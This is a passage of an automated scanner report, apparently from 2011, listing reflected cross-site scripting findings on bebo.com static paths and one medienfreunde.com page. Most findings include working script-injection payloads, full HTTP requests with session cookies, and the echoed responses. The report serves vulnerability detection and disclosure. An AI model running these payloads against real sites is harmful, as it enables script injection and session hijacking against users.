<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-siteef1cd"><img src=a onerror=alert(1)>e91147b2c03-_default" >
...[SNIP]...

2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 292f7'><script>alert(1)</script>55c886dab8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site292f7'><script>alert(1)</script>55c886dab8f/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14694
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site292f7'><script>alert(1)</script>55c886dab8f/_default_css&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d56a'%3b4e37d154695 was submitted in the REST URL parameter 2. This input was echoed as 5d56a';4e37d154695 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Site5d56a'%3b4e37d154695/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14483
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site5d56a';4e37d154695/_default.css/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('
...[SNIP]...

2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18ffc<script>alert(1)</script>491fb71b12c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14676
Date: Wed, 06 Jul 2011 11:22:14 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css page, please try again.</div>
...[SNIP]...

2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3141'><script>alert(1)</script>03a6132018e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site/_default.cssd3141'><script>alert(1)</script>03a6132018e?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14244
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site/_default_cssd3141'><script>alert(1)</script>03a6132018e&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f was submitted in the REST URL parameter 3. This input was echoed as af2df"><img src=a onerror=alert(1)>11c0a48793f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Site/af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14267
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-af2df"><img src=a onerror=alert(1)>11c0a48793f" >
...[SNIP]...

2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4d42'%3b1c774af16d5 was submitted in the REST URL parameter 3. This input was echoed as a4d42';1c774af16d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Site/_default.cssa4d42'%3b1c774af16d5?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14081
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site/_default.cssa4d42';1c774af16d5/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87eb8<script>alert(1)</script>fda742dfacd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:13 GMT
Content-Length: 14722
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js page, please try again.</div>
...[SNIP]...

2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d8f'%3b5319fe373f was submitted in the REST URL parameter 2. This input was echoed as b2d8f';5319fe373f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/siteb2d8f'%3b5319fe373f/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:12 GMT
Content-Length: 14520
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/siteb2d8f';5319fe373f/index20_script.js/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleR
...[SNIP]...

2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6 was submitted in the REST URL parameter 2. This input was echoed as 123b5"><img src=a onerror=alert(1)>3788d604ea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site123b5"><img%20src%3da%20onerror%3dalert(1)>3788d604ea6/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 14823
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site123b5"><img src=a onerror=alert(1)>3788d604ea6-index20_script" >
...[SNIP]...

2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 10a5d'><script>alert(1)</script>8dd8fd16174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:11 GMT
Content-Length: 14740
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site10a5d'><script>alert(1)</script>8dd8fd16174/index20_script_js&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=nl'>
...[SNIP]...

2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac75'%3be425e5815a9 was submitted in the REST URL parameter 3. This input was echoed as cac75';e425e5815a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/site/index20_script.jscac75'%3be425e5815a9?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14122
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
UT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/site/index20_script.jscac75';e425e5815a9/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10 was submitted in the REST URL parameter 3. This input was echoed as 694e4"><img src=a onerror=alert(1)>c97eeae1d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/694e4"><img%20src%3da%20onerror%3dalert(1)>c97eeae1d10?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14278
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-694e4"><img src=a onerror=alert(1)>c97eeae1d10" >
...[SNIP]...

2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab was submitted in the REST URL parameter 3. This input was echoed as ee94a<img src=a onerror=alert(1)>dae524548ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/site/index20_script.jsee94a<img%20src%3da%20onerror%3dalert(1)>dae524548ab?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:20 GMT
Content-Length: 14366
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: index20_script.jsee94a<img src=a onerror=alert(1)>dae524548ab.</div>
...[SNIP]...

2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 810dd'><script>alert(1)</script>9bdaf6f52b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site/index20_script.js810dd'><script>alert(1)</script>9bdaf6f52b2?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14291
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/site/index20_script_js810dd'><script>alert(1)</script>9bdaf6f52b2&QueryString=fp%3D1ac0db15f4e80064d8323ae07c9b030a&Lang=fr'>
...[SNIP]...

2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bc"><script>alert(1)</script>80bc0e527c9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

